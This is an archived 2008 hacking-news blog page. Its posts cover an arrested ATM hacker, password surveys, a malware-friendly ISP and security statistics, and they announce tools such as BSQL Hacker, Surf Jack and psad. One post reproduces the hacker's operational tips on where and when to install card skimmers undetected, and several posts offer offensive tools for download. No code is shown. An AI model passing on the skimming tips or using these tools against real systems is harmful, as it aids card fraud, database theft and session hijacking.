Archive | September, 2008

Pro ATM Hacker ‘Chao’ Gives Out ATM Hacking Tips

Your website & network are Hackable


It seems like ATM hacking is still the way to go for those into a bit of hardware hacking. One of the most notorious and well known ATM hackers was recently arrest in Turkey and a list of his tips discovered online where he also sold the ATM skimming equipment.

Well his tips can’t be THAT good if he got caught can they?

A bank-machine hacker who reportedly was arrested earlier this month in Turkey gave would-be fraudsters tips on how to install rogue card-reading devices, including advising them to target drive-through ATMs (automated teller machines) and avoid towns with fewer than 15,000 residents.

The hacker, who went by the handle “Chao,” reportedly was arrested earlier this month in Turkey. He was one of the most well-known ATM hackers in the world, according to Uri Rivner, head of new technologies for RSA Consumer Solutions.

Chao sold fake faceplates that fraudsters could attach to the card slots in ATMs. These “skimmer” devices can read the magnetic stripe of every customer’s ATM or credit card, and are often used in conjunction with a hidden camera that watches people enter their PINs (personal identification numbers), Rivner said. Alternatively, criminals can attach an extra keypad on top of the one in the machine and capture the PIN that way, he added.

It seems like the old methods are still prevailing but the kit used is probably lot smaller, neater and unobtrusive. They skim your card, record your pin on the number pad with a micro dot camera and usually beam it all to a wifi PC nearby which will pipe it back to the owner over the net with a 3G phone or similar.

Just be careful where you use the ATM machine and cover the numberpad with your other hand when you are typing to the PIN to be extra vigilant.

  • don’t install a skimmer in the morning, because people are more vigilant then;
  • determine where a person would have to stand to keep an eye on everything happening on that block;
  • avoid blocks where more than 250 people per day walk through, because of the danger of detection;
  • don’t install skimmers in towns with fewer than 15,000 people, because people in those towns know what their ATMs look like;
  • avoid areas with small shops open 24 hours a day, because there may be surveillance cameras and vigilant shopkeepers;
  • don’t set up in areas where a lot of illegal immigrants live;
  • places with a lot of tourist traffic are good;
  • look for affluent neighborhoods and drive-through ATMs;
  • ATMs near cash-only bars are a good bet for lots of customer activity.

The tips are really nothing ground-breaking, but interesting to read nevertheless. Most of them could be considered common sense, but some like not targeting really small towns are quite interesting.

I would have thought busy times would have been the best time to go in as long as there is no-one else queuing at the ATM machine.

Source: NetworkWorld


Posted in: Hardware Hacking, Spammers & Scammers

Tags: , , , , , , ,

Posted in: Hardware Hacking, Spammers & Scammers | Add a Comment
Recent in Hardware Hacking:
- Intel Hidden Management Engine – x86 Security Risk?
- Fitbit Vulnerability Means Your Tracker Could Spread Malware
- Kid Gets Arrested For Building A Clock – World Goes NUTS

Related Posts:

Most Read in Hardware Hacking:
- Elevator/Lift Hacking !!!!! - 79,327 views
- Military Communications Hacking – Script Kiddy Style - 49,819 views
- Hackers Crack London Tube Oyster Card - 45,083 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


dnsscan – DNS Open Recursive Resolver Scanner/Scanning Tool

Your website & network are Hackable


Dnsscan is a tool for finger printing open recursive resolvers. It runs in conjuction with a small server that knows how to reply to queries forwarded from probed resolvers. For example, assume that you have delegated osd.example.org:

On 10.0.0.1, you would run:

On the client that initiates the DNS probes, you would run

Progress of the dnsscan tool can be monitored via a web browser on port 8080. If the tool crashes or gets terminated, it can be restarted from the checkpoint file.

Both of the tools log their output into files, the output can be inspected with the dnsreader tool.

If this does not mean anything to you, you should probably not use this tool. This tool has been released to support repeatable research, some of the results obtained with tools such as these have been published at NDSS’08.

Notice

Use of dnsscan across a large network block requires coordination with your network provider. In all likelihood, you will receive (and must manage) abuse complaints due to the volume of DNS queries. You should consult RFC 1262 for suggestions on how to conduct such Internet-wide studies.

You can download dnsscan v1.0 here:

dnsscan-1.0.tar.gz

Or read more here.


Posted in: Hacking Tools, Network Hacking

Tags: , , , , , , , ,

Posted in: Hacking Tools, Network Hacking | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,986,518 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,454,287 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 683,777 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Brits Give Up Passwords For a £5 Gift Voucher

Find your website's Achilles' Heel


So it turns out you don’t need any fancy password cracking software like John the Ripper or Cain and Abel you just need a handful of £5 gift vouchers for Marks and Spencers!

But we had discussed this in part before, some people will give out their passwords if you just ask, some if you offer chocolate and this time in the guise of a ‘survey’ for a gift voucher.

Although the majority (60 percent) of 207 London residents were happy to hand over computer password data which might be useful to potential ID thieves in exchange for a £5 M&S gift voucher, the public at large take a hard line on firms who fail to keep tight hold of customer data.

In exchange for the voucher, a number of those quizzed during a street survey in Covent Garden earlier this week went on to explain how they remember their password and which online websites (from a range of email, shopping, banking and social networking sites) they most frequently use. A sizeable chunk of those surveyed (45 per cent) said they used either their birthday, their mother’s maiden name or a pet’s name as a password.

Perhaps it’s just as well that stolen identities are worth a lot less than £5, fetching as little as 50p on the underground black market, according to Symantec.

It seems like rather than giving out the actual password they answered questions put together in such a way that a profiler could easily work out what their password was and which sites they used it on.

Pretty sneaky methinks, it’s a good way to test how paranoid people are about their data security…it’s ironic really seeing how much they complain but at the end of it they are their own worst danger.

ine in ten (89 per cent) of 1,000 Brits quizzed during a wider survey, commissioned by Symantec and price comparison site moneysupermarket.com, expressed the opinion that “reckless and repeated” data breaches ought to be punished by criminal prosecutions. Sanctions should include the ability to incarcerate directors of negligent firms in jail. Eight out of ten of those quizzed agreed there should be a “one strike and you’re out” rule for data loss.

Almost four in five of those polled reckon their personal data is not secure in the hands of companies that hold it, a finding that probably stems from the steady drip of data breach stories that have followed from the massive HMRC child benefit lost disc bungle last year. Three in four consumers are concerned about the amount of information organisation hold on them, regardless of whether or not this information is held online or offline. Online payments were perceived as the single greatest risk for losing data.

The general public are pretty harsh too when it comes to dishing out punishment, but then again that is human nature and that is why there’s jury service.

It’s not surprising either that people have very little faith in data stored by the government and their greatest fear is carrying out online transactions.

I think we all know well enough to keep ourselves safe…but sadly as always it seems the rest of the world don’t.

Source: The Register


Posted in: Password Cracking, Social Engineering

Tags: , , , ,

Posted in: Password Cracking, Social Engineering | Add a Comment
Recent in Password Cracking:
- SamParser – Parse SAM Registry Hives With Python
- RWMC – Retrieve Windows Credentials With PowerShell
- 123456 Still The Most Common Password For 2015

Related Posts:

Most Read in Password Cracking:
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,454,287 views
- Password Cracking Wordlists and Tools for Brute Forcing - 584,044 views
- Password Cracking with Rainbowcrack and Rainbow Tables - 435,340 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


BSQL Hacker – Automated SQL Injection Framework

Find your website's Achilles' Heel


BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.

It ships with Automated Attack modules which allows the dumping of whole databases for the following DBMS:

  • MS-SQL Server
  • ORACLE
  • MySQL (experimental)

Attack Templates for:

  • MS Access
  • MySQL
  • ORACLE
  • PostgreSQL
  • MS-SQL Server

Also you can write your own attack template for any other database as well (see the manual for details). New attack templates and exploits for specific web application can be shared via Exploit Repository.

BSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

It supports :

  • Blind SQL Injection (Boolean Injection)
  • Full Blind SQL Injection (Time Based)
  • Deep Blind SQL Injection (a new way to exploit BSQLIs, explained here)
  • Error Based SQL Injection

It allows metasploit alike exploit repository to share and update exploits and attack temlpates.

You can download BSQL Hacker here:

BSQLHackerSetup-0907.exe

Or read more here.


Posted in: Database Hacking, Hacking Tools, Web Hacking

Tags: , , , , , , , , ,

Posted in: Database Hacking, Hacking Tools, Web Hacking | Add a Comment
Recent in Database Hacking:
- Onapsis Bizploit v1.50 – SAP Penetration Testing Framework
- OAT – Oracle Auditing Tools For Database Security
- ODAT (Oracle Database Attacking Tool) – Test Oracle Database Security

Related Posts:

Most Read in Database Hacking:
- Pangolin – Automatic SQL Injection Tool - 76,878 views
- bsqlbf 1.1 – Blind SQL Injection Tool - 54,480 views
- SQLBrute – SQL Injection Brute Force Tool - 41,256 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Intercage – Spam/Malware Friendly ISP Back Online

Find your website's Achilles' Heel


There has been a big hoo-haa recently about a US ISP called Intercage who have said to have been harbouring spammers and scammers via their largest client an Eastern European webhost called Esthost.

Their plug got pulled 2 days ago by the upstream provider IP transit provider UnitedLayer after weeks of criticism from the community showing IP addresses under the management of Intercage were hosting a number of sites engaged in phishing, malware propagation, and other illegal activities.

It’s a pretty bold move by UnitedLayer..but Intercage and their website is back online now.

A day after security experts celebrated the death of a network provider accused of hosting a large concentration of the world’s cybercrime, California-based Intercage appeared to be among the living again.

IP transit provider UnitedLayer agreed to provide upstream service to Intercage about 36 hours after its last transit provider pulled the plug. UnitedLayer’s move, which is sure to prove unpopular in some circles, came after Intercage agreed to completely sever ties with Esthost, the Eastern European web host believed by many to be responsible for the lion’s share of abusive traffic carried by Intercage.

The dumping of Esthost, if true, would mark a major turning point for Intercage. Esthost, which according to many researchers hosts a large number of sites engaged in phishing, malware propagation, and other illegal activities, has relied on Intercage since 2004 and is responsible for 25 percent to 50 percent of its revenue, according to Intercage president and owner Emil Kacperski.

It looks like it’s going to hurt them with between a quarter and a half of their revenue coming from this one customer! They shouldn’t have put all their eggs in one basket, especially a malware ridden Eastern European basket.

I think Internet Exchanges and upstream providers need to be more vigilant about spam and malware propagation sites, if hosts refuse to sort the problem out – pull the plug!

For its part, UnitedLayer officials said they thought long and hard about the decision to take on Intercage as a customer, and based on the promises they got, they decided it made sense.

“We have been assured by Emil and Intercage that the customer in question that caused this firestorm has been removed,” said UnitedLayer COO Richard Donaldson. “And we have said very unequivocally to Emil that when and if factual evidence is provided to us that puts him in violation of our AUP (acceptable use policy)…then we will terminate them like we would any other client.”

Over the past few weeks, the Intercage saga has at times resembled the wild west, where justice is meted out by an informal network of power brokers rather than duly appointed officials. Given the frequent inability of today’s law enforcement in overcoming a rat’s nest of extra-territorial and technical issues, this form of frontier justice is probably unavoidable. And in any case, the vast majority of the white hats manning the system are honest and have netizens’ best interests at heart.

There is definitely a potential for abuse here and it’s something that needs to be watched. More people need to take time to submit abuse reports, headers and IP addresses to the upstream providers, data centers and hosts involved.

Some may not know what the sites on their network are doing, some may actually be hacked, and some may be complicit with the spammers – but either way people need to report!

It’s an interesting story and definitely one to watch, let’s just hope no-one starts to abuse this with RIAA take-down notices etc.

Source: The Register


Posted in: Legal Issues, Malware, Spammers & Scammers

Tags: , , , , , , , , , , ,

Posted in: Legal Issues, Malware, Spammers & Scammers | Add a Comment
Recent in Legal Issues:
- The Panama Papers Leak – What You Need To Know
- FBI Backed Off Apple In iPhone Cracking Case
- TalkTalk Hack – Breach WAS Serious & Disclosed Bank Details

Related Posts:

Most Read in Legal Issues:
- Class President Hacks School Grades - 80,715 views
- Hospital Hacker GhostExodus Owns Himself – Arrested - 47,651 views
- One Of The World’s Most Prolific Music Piracy Groups Busted - 43,629 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


ohrwurm – RTP Fuzzing Tool (SIP Phones)

Find your website's Achilles' Heel


ohrwurm is a small and simple RTP fuzzer, it has been tested it on a small number of SIP phones, none of them withstood the fuzzing.

Features:

  • reads SIP messages to get information of the RTP port numbers
  • reading SIP can be omitted by providing the RTP port numbers, so that any RTP traffic can be fuzzed
  • RTCP traffic can be suppressed to avoid that codecs learn about the “noisy line”
  • special care is taken to break RTP handling itself
  • the RTP payload is fuzzed with a constant BER
  • the BER is configurable
  • requires arpspoof from dsniff to do the MITM attack
  • requires both phones to be in a switched LAN (GW operation only works partially)

You can download ohrwurm 0.1 here:

ohrwurm-0.1.tar.bz2

Or read more here.


Posted in: Hacking Tools, Network Hacking, Programming

Tags: , , , , , , , , , , ,

Posted in: Hacking Tools, Network Hacking, Programming | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,986,518 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,454,287 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 683,777 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Modern Exploits – Do You Still Need To Learn Assembly Language (ASM)

Your website & network are Hackable


This is a fairly interesting subject I think as a lot of people still ask me if they are entering the security field if they still need to learn Assembly Language or not?

Assembly Language

For those that aren’t what it is, it’s pretty much the lowest level programming languages computers understand without resorting to simply 1’s and 0’s.

An assembly language is a low-level language for programming computers. It implements a symbolic representation of the numeric machine codes and other constants needed to program a particular CPU architecture. This representation is usually defined by the hardware manufacturer, and is based on abbreviations (called mnemonics) that help the programmer remember individual instructions, registers, etc. An assembly language is thus specific to a certain physical or virtual computer architecture (as opposed to most high-level languages, which are usually portable).

The mnemonics looks like MOV JMP and PSH.

In straight forward terms the answer is yes, especially if you want to operate on a more advanced level. If you wish to write exploits you need assembly knowledge, there is plenty of great shellcode around but to get your exploit to the point where you can execute the shellcode you need assembly knowledge. Metasploit is a great resource for the shellcode and to shovel in your exploit, but to understand the inner executions and workings of any binary you need to understand assembly.

You might be able to fuzz out an overflow in some software using a pre-written python fuzzer, but what are you going to do then – you need to at least understand the stack/heap and EIP/ESP etc.

Even if you don’t plan to be that hardcore learning Assembly really won’t hurt at all, a great place to start is the PC Assembly Language book by Paul Carter.


The tutorial has extensive coverage of interfacing assembly and C code and so might be of interest to C programmers who want to learn about how C works under the hood. All the examples use the free NASM (Netwide) assembler. The tutorial only covers programming under 32-bit protected mode and requires a 32-bit protected mode compiler.

If you are specialising though you’ll be looking more into the realm of debuggers, disassemblers and reverse engineering – SoftICE was king back in the day.

Another great resource is Iczelion’s Win32 Assembly Homepage which has a bunch of tutorials, source code examples and links.

As many say Assembly is easy to learn but hard to MASTER.

I started out with The Art of Assembly – and I suggest you do too.

Some other resources:


Posted in: Exploits/Vulnerabilities, Programming

Tags: , , , , , , , , , , , , , , ,

Posted in: Exploits/Vulnerabilities, Programming | Add a Comment
Recent in Exploits/Vulnerabilities:
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- Pompem – Exploit & Vulnerability Finder
- Bug Bounties Reaching $500,000 For iOS Exploits

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 235,382 views
- AJAX: Is your application secure enough? - 120,192 views
- eEye Launches 0-Day Exploit Tracker - 85,634 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Surf Jack – Cookie Session Stealing Tool

Your website & network are Hackable


A tool which allows one to hijack HTTP connections to steal cookies – even ones on HTTPS sites! Works on both Wifi (monitor mode) and Ethernet.

Features:

  • Does Wireless injection when the NIC is in monitor mode
  • Supports Ethernet
  • Support for WEP (when the NIC is in monitor mode)

Known issues:

  • Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail)
  • Cannot stop the tool via a simple Control^C. This is a problem with the proxy

Requires:

You can download Surf Jack here:

surfjack-0.2b.zip

Or read more here.


Posted in: Hacking Tools, Web Hacking

Tags: , , , , , , , , ,

Posted in: Hacking Tools, Web Hacking | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,986,518 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,454,287 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 683,777 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Web Application Security Statistics for 2008

Find your website's Achilles' Heel


Purpose

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent regardless of the methodology used to identify them. Industry statistics such as those compiled by Mitre CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications, this project tries to be the equivalent for custom web applications

Goals

  1. Identify the prevalence and probability of different vulnerability classes
  2. Compare testing methodologies against what types of vulnerabilities they are likely to identify.

Methodology

The statistics was compiled from web application security assessment projects which were made by the following companies in 2007 (in alphabetic order):

Booz Allen Hamilton
BT
Cenzic with Hailstorm and ClickToSecure
dblogic.it
HP Application Security Center with WebInspect
Positive Technologies with MaxPatrol
Veracode with Veracode Security Review
WhiteHat Security with WhiteHat Sentinel

There’s some pretty interestesting statistics there.

Read the full report here:

http://www.webappsec.org/projects/statistics/


Posted in: Web Hacking

Tags: , , , , , ,

Posted in: Web Hacking | Add a Comment
Recent in Web Hacking:
- Everything You Need To Know About Web Shells
- DMitry – Deepmagic Information Gathering Tool
- TeamViewer Hacked? It Certainly Looks Like It

Related Posts:

Most Read in Web Hacking:
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 683,777 views
- Web Based E-mail (Hotmail Yahoo Gmail) Hack/Hacking with JavaScript - 311,913 views
- Download youtube.com videos? - 156,555 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


psad – Intrusion Detection and Log Analysis with iptables

Your website & network are Hackable


psad is a collection of three lightweight system daemons (two main daemons and one helper daemon) that run on Linux machines and analyze iptables log messages to detect port scans and other suspicious traffic. A typical deployment is to run psad on the iptables firewall where it has the fastest access to log data.

psad incorporates many signatures from the Snort intrusion detection system to detect probes for various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven), DDoS tools (mstream, shaft), and advanced port scans (FIN, NULL, XMAS) which are easily leveraged against a machine via nmap.

When combined with fwsnort and the Netfilter string match extension, psad is capable of detecting many attacks described in the Snort rule set that involve application layer data. In addition, psad makes use of various packet header fields associated with TCP SYN packets to passively fingerprint remote operating systems (in a manner similar to p0f) from which scans originate.

For more information, see the complete list of features offered by psad.

psad is developed around three main principles:

  • Good network security starts with a properly configured firewall.
  • A significant amount of intrusion detection data can be gleaned from firewalls logs, especially if the logs provide information on nearly every field of the network and transport headers (and even application layer signature matches as in Netfilter’s case).
  • Suspicious traffic should not be detected at the expense of trying to also block such traffic.

You can download psad v2.1.4 here:

psad-2.1.4.tar.gz (Source tar)
psad-2.1.4-1.i386.rpm (i386 binary RPM).

Or read more here.


Posted in: Countermeasures, Network Hacking, Security Software

Tags: , , , , , , ,

Posted in: Countermeasures, Network Hacking, Security Software | Add a Comment
Recent in Countermeasures:
- OpenIOC – Sharing Threat Intelligence
- Cuckoo Sandbox – Automated Malware Analysis System
- Fully Integrated Defense Operation (FIDO) – Automated Incident Response

Related Posts:

Most Read in Countermeasures:
- AJAX: Is your application secure enough? - 120,192 views
- Password Hasher Firefox Extension - 117,847 views
- NDR or Backscatter Spam – How Non Delivery Reports Become a Nuisance - 57,740 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95